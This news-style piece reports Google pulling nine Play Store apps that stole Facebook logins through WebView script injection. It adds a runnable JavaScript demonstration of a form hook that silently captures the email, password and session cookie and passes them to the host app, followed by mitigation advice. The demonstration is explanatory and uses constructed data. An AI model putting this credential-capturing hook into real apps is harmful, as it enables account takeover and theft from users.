Android apps on the Google Play Store that their own developers turn against users are nothing new, and the problem has forced Google into an endless race to pull apps that commit major privacy violations.
A recent report from Ars Technica states that Google has removed nine apps from the Play Store after analysts identified them as trojans used to siphon Facebook login credentials. According to the Dr. Web researchers who found them, the apps had been downloaded more than 5.8 million times in total, posing as the kind of popular, easily found utility app users search for every day. The nine apps are:
- Processing Photo
- App Lock Keep
- Rubbish Cleaner
- Horoscope Daily
- Horoscope Pi
- App Lock Manager
- Lockit Master
- Inwell Fitness
- PiP Photo
The apps tricked users by loading the Facebook sign-in page inside the app, in an embedded WebView, and then loading JavaScript from a command-and-control server into that page to steal the credentials typed into it and pass them back to the app.
The report adds that the attackers also stole the cookies of the authenticated session, which can be replayed to hijack the account without the password. In every case Facebook was the target, although the same technique could just as easily have steered users to other online services.
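To make the mechanism concrete, here is an added illustration (not code from the report, from Dr. Web, or from the apps named above) of why a login page rendered inside another app's WebView cannot protect its own form fields: the host app can evaluate arbitrary JavaScript in the page and expose a bridge object to it. The `makeFakeLoginPage` and `makeBridge` objects are constructed stand-ins for the DOM and for an `addJavascriptInterface`-style bridge so the snippet runs under Node without a browser; `hookLoginForm` is a hypothetical name, and the cookie and credential values are made-up sample data.

```javascript
'use strict';

// Constructed stand-in for the slice of the DOM the injected script touches.
// A real page would be the site's login form rendered in the app's WebView.
function makeFakeLoginPage() {
  const fields = { email: '', pass: '' };          // what the user types
  const submitListeners = [];
  const form = {
    querySelector(selector) {
      const name = selector.replace(/^input\[name="(.*)"\]$/, '$1');
      return {
        get value() { return fields[name]; },
        set value(v) { fields[name] = v; },
      };
    },
    addEventListener(type, fn) {
      if (type === 'submit') submitListeners.push(fn);
    },
    // A real submit would POST to the site; here we only fire the listeners.
    submit() {
      for (const fn of submitListeners) fn({ preventDefault() {} });
    },
  };
  return {
    // Sample cookie string (constructed). Page script sees non-HttpOnly cookies;
    // the host app can read every cookie for the domain through CookieManager
    // regardless of the HttpOnly flag, so that flag does not help here either.
    cookie: 'c_user=100000000000001; xs=0%3Asample%3A2',
    querySelector(selector) {
      return selector === 'form#login_form' ? form : null;
    },
    type(email, pass) { fields.email = email; fields.pass = pass; },
  };
}

// Constructed stand-in for an object the host app exposes to page script
// with WebView.addJavascriptInterface(); postMessage() lands in app code.
function makeBridge() {
  const received = [];
  return {
    received,
    postMessage(json) { received.push(JSON.parse(json)); },
  };
}

// The script a host app would evaluate in the page once the form has loaded
// (WebView.evaluateJavascript). It hooks submit, reads the fields and the
// cookie as ordinary page state, and lets the real login continue so the
// user notices nothing. Returns false if the expected form is not present.
function hookLoginForm(document, bridge) {
  const form = document.querySelector('form#login_form');
  if (!form) return false;
  form.addEventListener('submit', () => {
    bridge.postMessage(JSON.stringify({
      email: form.querySelector('input[name="email"]').value,
      pass: form.querySelector('input[name="pass"]').value,
      cookie: document.cookie,
    }));
    // Deliberately no preventDefault(): the genuine login proceeds.
  });
  return true;
}

// End-to-end run on constructed data; returns what reached the host app.
function demo() {
  const page = makeFakeLoginPage();
  const bridge = makeBridge();
  hookLoginForm(page, bridge);
  page.type('victim@example.com', 'correct horse battery staple'); // constructed
  page.querySelector('form#login_form').submit();
  return bridge.received;
}

console.log(JSON.stringify(demo(), null, 2));
```

The page itself has no defence: from the site's side the request comes from a logged-in user, and it cannot tell a trusted browser from a WebView the host app controls. The practical mitigations sit elsewhere. Users should not type third-party credentials into a login form that appears inside an unrelated app; developers who need a third-party login should hand off to the system browser or Chrome Custom Tabs with an OAuth redirect rather than a WebView; and a store reviewer can treat an app that loads a login page into a WebView with a JavaScript bridge attached as a red flag.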
Google responded to the report by banning the developers from the store. That is hardly a final answer, since the culprits can simply register new developer accounts and publish fresh apps; Google would have to detect the malware itself, and the behaviour behind it, so that it cannot be reused under a new name.
The biggest question is how the apps accumulated so many downloads before the crackdown. The new identification requirements for developers may help, but there is still a lot more Google needs to do to secure its users.